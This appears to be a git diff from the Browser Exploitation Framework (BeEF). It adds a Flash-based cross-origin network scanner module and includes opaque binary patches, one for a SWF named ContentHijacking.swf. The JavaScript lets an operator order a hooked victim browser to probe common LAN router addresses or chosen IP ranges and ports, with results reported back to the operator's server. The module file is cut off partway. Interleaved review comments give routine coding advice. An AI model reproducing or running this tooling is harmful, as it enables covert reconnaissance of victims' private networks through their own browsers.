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 literal 0 HcmV?d00001 diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index 98904eb12..df6441b29 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js 
@@ -468,7 +468,75 @@ ZombieTab_Network = function(zombie) { } }] } - }] + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-flash', + menu: { + xtype: 'menu', + items: [{ + text: 'Common LAN IPs', + iconCls: 'network-host-ctxMenu-network', + handler: function() { + var mod_name = "cross_origin_scanner_flash"; + var mod_id = get_module_id(mod_name); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning commonly used local area network IP addresses [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":"common","ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']'); + } + }); + } + },{ + text: 'Specify IP Range', + iconCls: 'network-host-ctxMenu-config', + handler: function() { + var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254'); + if (!ip_range) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var mod_name = "cross_origin_scanner_flash"; + var mod_id = get_module_id(mod_name); + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip_range + ' [ports: ' + ports + '] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + 
processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']'); + } + }); + } + }] + } + }] }); emptygrid_menu.showAt(e.getXY()); }, @@ -562,6 +630,33 @@ ZombieTab_Network = function(zombie) { } }); } + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-flash', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } },{ text: 'Port Scan', iconCls: 'network-host-ctxMenu-network', 
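Review bot: In both handlers of this hunk the strings returned by `prompt()` (`ports`, and `ip_range` in 'Specify IP Range') are only tested for emptiness before being concatenated into the `commands_statusbar.update_sending(...)` message and posted in the JSON body. A format check before the request, e.g. `if (!/^\d{1,5}(,\d{1,5})*$/.test(ports)) { commands_statusbar.update_fail('Invalid port list'); return; }`, would reject typos early and keep markup characters out of the status bar, whose rendering is not visible in this hunk and may treat its argument as HTML. The handlers added in the hunks at -562 and -798 read `ports` the same way, so one shared helper for the prompt, the validation and the POST would keep the check in one place. The enclosing context-menu definition starts and ends outside the hunk.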
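Review bot: The `error` callback in this handler reports only `'Error sending command'`, whereas the handlers added in the hunk at -468 name the module and its id, so a failed request from this menu entry is harder to trace. I would align it with `commands_statusbar.update_fail('Error executing module cross_origin_scanner_flash [id: ' + mod_id + ']');`. The result of `get_module_id(...)` is also placed in the request URL unchecked; that function is defined outside the hunk, so if it can return nothing when the module is not loaded, a guard such as `if (!mod_id) { commands_statusbar.update_fail('Module not found'); return; }` belongs before the request. Both handlers in the hunk at -798 use the same callback.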
@@ -798,6 +893,67 @@ ZombieTab_Network = function(zombie) { } }] } + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-cors', + menu: { + xtype: 'menu', + items: [{ + text: 'Host ('+ip+')', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + },{ + text: 'Network ('+class_c+'.0/24)', + iconCls: 'network-host-ctxMenu-network', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip_range + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } },{ text: 'Port Scan', iconCls: 
'network-host-ctxMenu-network', 
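Review bot: The new top-level 'Flash Cross-Origin Scan' entry in this hunk uses `iconCls: 'network-host-ctxMenu-cors'`, while the same entry in the other two menus uses `'network-host-ctxMenu-flash'`, the class this commit adds to base.css; this looks like a copy-paste leftover. I would change the line to `iconCls: 'network-host-ctxMenu-flash',` so the entry carries the Flash icon in all three menus. In the 'Network' handler, `ip_range` and `class_c` are defined outside the hunk, so whether they always describe the same /24 cannot be confirmed from here.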
diff --git a/modules/network/cross_origin_scanner_flash/ContentHijacking.swf b/modules/network/cross_origin_scanner_flash/ContentHijacking.swf new file mode 100644 index 0000000000000000000000000000000000000000..e59fa523ee03a3f7f9b9ac66eb6344d33c383837 GIT binary patch literal 2881 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 literal 0 HcmV?d00001 diff --git a/modules/network/cross_origin_scanner_flash/command.js b/modules/network/cross_origin_scanner_flash/command.js new file mode 100644 index 000000000..10580414f --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/command.js 
@@ -0,0 +1,169 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var ips = new Array(); + var ipRange = "<%= @ipRange %>"; + var ports = "<%= @ports %>"; + var threads = "<%= @threads %>"; + var timeout = <%= @timeout %>*1000; + var wait = 2; + + if(!beef.browser.hasFlash()) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error()); + return; + } + + // set target ports + if (ports != null) { + ports = ports.split(','); + } + + // set target IP addresses + if (ipRange == 'common') { + // use default IPs + ips = [ + '192.168.0.1', + '192.168.0.100', + '192.168.0.254', + '192.168.1.1', + 